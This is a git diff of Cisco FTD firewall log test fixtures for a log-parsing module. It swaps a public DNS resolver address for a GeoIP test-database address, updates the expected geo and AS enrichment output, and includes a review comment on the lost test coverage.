InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -1956,9 +1945,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 11801, + "log.offset": 11872, "network.application": "dns client", - "network.community_id": "1:nTPeg7DUgB3rjeFwl+cm5VHEdXQ=", + "network.community_id": "1:f+1BLN4exLJYoDCfuD6+el4NNZc=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", 
@@ -1975,7 +1964,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" @@ -2010,7 +1999,7 @@ "cisco.ftd.security.dns_query": "elastic.co", "cisco.ftd.security.dns_record_type": "an authoritative name server", "cisco.ftd.security.dns_ttl": "21599", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -2027,16 +2016,17 @@ "cisco.ftd.security.src_port": "57141", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 221, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "dns.question.name": "elastic.co", 
@@ -2052,7 +2042,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -2066,9 +2056,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 12477, + "log.offset": 12553, "network.application": "dns client", - "network.community_id": "1:R1FcZHFFvO0mHFfeVXH/CwTGCmU=", + "network.community_id": "1:lQqpyFbf8OB4k/v/Xp3qTDb5NiQ=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", 
@@ -2085,7 +2075,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" @@ -2119,7 +2109,7 @@ "cisco.ftd.security.connection_duration": "0", "cisco.ftd.security.dns_record_type": "a domain name pointer", "cisco.ftd.security.dns_ttl": "59", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -2136,16 +2126,17 @@ "cisco.ftd.security.src_port": "46093", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 131, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "dns.question.type": "PTR", 
@@ -2160,7 +2151,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -2174,9 +2165,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 13152, + "log.offset": 13233, "network.application": "dns client", - "network.community_id": "1:k5kQaEfpetJ7SxFkG7Ytzzz5ik0=", + "network.community_id": "1:J7DpSxMrG7llgbHfyoi5VniCjj8=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", @@ -2193,7 +2184,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" 
@@ -2229,7 +2220,7 @@ "cisco.ftd.security.dns_query": "elastic.co", "cisco.ftd.security.dns_record_type": "text strings", "cisco.ftd.security.dns_ttl": "299", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -2247,16 +2238,17 @@ "cisco.ftd.security.src_port": "58082", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 722, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "dns.question.name": "elastic.co", 
@@ -2272,7 +2264,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", 
@@ -2286,9 +2278,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 13795, + "log.offset": 13881, "network.application": "dns client", - "network.community_id": "1:jVTdIEwjG0Eb77jGrcDygrNq9jg=", + "network.community_id": "1:7tN8tGLiJNoFT89lpvR+QyNOZBM=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", @@ -2305,7 +2297,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json index 4d9798688477..5d1987b7ec6b 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json @@ -100,7 +100,7 @@ ] }, { - "@timestamp": "2014-04-15T09:34:34.000-04:00", + "@timestamp": "2014-04-15T11:34:34.000-02:00", "cisco.ftd.destination_interface": "outside", "cisco.ftd.message_id": "106100", "cisco.ftd.rule_name": "acl_in", @@ -1926,7 +1926,7 @@ ] }, { - "@timestamp": "2018-04-15T09:34:34.000-04:00", + "@timestamp": "2018-04-15T11:34:34.000-02:00", "cisco.ftd.destination_interface": "outside", "cisco.ftd.message_id": "106100", "cisco.ftd.rule_name": "acl_in", diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log index c81a41dfb1f7..a82fe965d197 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log +++ b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log 
@@ -1,7 +1,7 @@
 2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity
 2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity
-2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
-2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, 
IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
+2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
+2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
 2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, 
SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
 2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb
 2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
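Review bot: Only the 8.8.8.8 destinations in this hunk move to the GeoIP test-database address 175.16.199.1, while the remaining lines of the file keep real public addresses (52.59.244.233, 213.211.198.62), and the expected-output hunks for this file then delete every `destination.geo.*` and `destination.as.*` field for those two addresses rather than asserting a value, which looks like the test database simply has no entry for them. Pinning fixtures to the test database is the right call, since it keeps the expected output stable across GeoLite2 updates and avoids embedding third-party infrastructure addresses in the corpus, but as written the geo enrichment of the TCP/HTTP events in this file is no longer covered by any assertion. If that coverage is wanted, the TCP destinations should also be rewritten to test-database addresses with their expected geo fields restored; otherwise a sentence in the PR description stating which fixture addresses are expected to enrich would help whoever regenerates these files next. The security-malware-site.log hunk has the same shape: SrcIP becomes 89.160.20.112 and gains source.geo/source.as fields in the expected output, but DstIP stays 2.2.2.2 and its destination.geo/destination.as fields are dropped.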
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json index f5c9eb57649a..5433746ab11c 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json @@ -200,7 +200,7 @@ "cisco.ftd.security.client": "DNS client", "cisco.ftd.security.dns_query": "eu-central-1.ec2.archive.ubuntu.com", "cisco.ftd.security.dns_record_type": "a host address", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -217,16 +217,17 @@ "cisco.ftd.security.src_port": "50074", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 0, "destination.port": 53, "dns.question.name": "eu-central-1.ec2.archive.ubuntu.com", 
@@ -240,7 +241,7 @@ "event.dataset": "cisco.ftd", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", + "event.original": "%FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "event.outcome": "success", "event.severity": 1, "event.timezone": "-02:00", @@ -255,7 +256,7 @@ "log.level": "alert", "log.offset": 1182, "network.application": "dns client", - "network.community_id": "1:LrHhMjRxI8XLokucnZO43cq3wJ0=", + "network.community_id": "1:vG+yeohmfIAPUJBMid1qX88PX0U=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", @@ -272,7 +273,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" 
@@ -308,7 +309,7 @@ "cisco.ftd.security.dns_record_type": "a host address", "cisco.ftd.security.dns_response_type": "Non-Existent Domain", "cisco.ftd.security.dns_ttl": "86395", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -325,16 +326,17 @@ "cisco.ftd.security.src_port": "49264", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 314, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 2, "destination.port": 53, "dns.question.name": "siem-inside", 
@@ -350,7 +352,7 @@ "event.end": "2019-08-15T14:07:00.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-15T16:07:00.000Z", @@ -364,9 +366,9 @@ "host.hostname": "firepower", "input.type": "log", "log.level": "alert", - "log.offset": 1821, + "log.offset": 1826, "network.application": "dns client", - "network.community_id": "1:/cLFaau3XcCC0NUtxHnt+rWlO6A=", + "network.community_id": "1:xUJpK1OSTEvN8EZ/CQ5OoIXiid4=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", 
@@ -383,7 +385,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" @@ -430,17 +432,7 @@ "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", "destination.address": "52.59.244.233", - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 74, - "destination.geo.city_name": "Frankfurt am Main", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 50.1188, - "destination.geo.location.lon": 8.6843, - "destination.geo.region_iso_code": "DE-HE", - "destination.geo.region_name": "Hesse", "destination.ip": "52.59.244.233", "destination.packets": 1, "destination.port": 80, @@ -465,7 +457,7 @@ "host.hostname": "firepower", "input.type": "log", "log.level": "alert", - "log.offset": 2515, + "log.offset": 2525, "network.community_id": "1:L+Ul/KflTuC9qM1HyJ2hOk2/NSM=", "network.iana_number": 6, "network.transport": "tcp", @@ -538,17 +530,7 @@ "cisco.ftd.security.web_application": "Ubuntu", "cisco.ftd.source_interface": "inside", "destination.address": "52.59.244.233", - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 41319018, - "destination.geo.city_name": "Frankfurt am Main", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 50.1188, - "destination.geo.location.lon": 8.6843, - "destination.geo.region_iso_code": "DE-HE", - "destination.geo.region_name": "Hesse", "destination.ip": "52.59.244.233", "destination.packets": 29001, "destination.port": 80, 
@@ -577,7 +559,7 @@ "http.response.status_code": "200", "input.type": "log", "log.level": "alert", - "log.offset": 3037, + "log.offset": 3047, "network.application": [ "advanced packaging tool", "ubuntu" @@ -652,17 +634,7 @@ "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", "destination.address": "213.211.198.62", - "destination.as.number": 43341, - "destination.as.organization.name": "MDlink online service center GmbH", "destination.bytes": 74, - "destination.geo.city_name": "Magdeburg", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 52.1333, - "destination.geo.location.lon": 11.6167, - "destination.geo.region_iso_code": "DE-ST", - "destination.geo.region_name": "Saxony-Anhalt", "destination.ip": "213.211.198.62", "destination.packets": 1, "destination.port": 80, @@ -687,7 +659,7 @@ "host.hostname": "firepower", "input.type": "log", "log.level": "alert", - "log.offset": 3919, + "log.offset": 3929, "network.community_id": "1:TE/czajXLfyOntGRUMlWpOamN+I=", "network.iana_number": 6, "network.transport": "tcp", @@ -759,17 +731,7 @@ "cisco.ftd.security.user_agent": "curl/7.58.0", "cisco.ftd.source_interface": "inside", "destination.address": "213.211.198.62", - "destination.as.number": 43341, - "destination.as.organization.name": "MDlink online service center GmbH", "destination.bytes": 690, - "destination.geo.city_name": "Magdeburg", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 52.1333, - "destination.geo.location.lon": 11.6167, - "destination.geo.region_iso_code": "DE-ST", - "destination.geo.region_name": "Saxony-Anhalt", "destination.ip": "213.211.198.62", "destination.packets": 4, "destination.port": 80, 
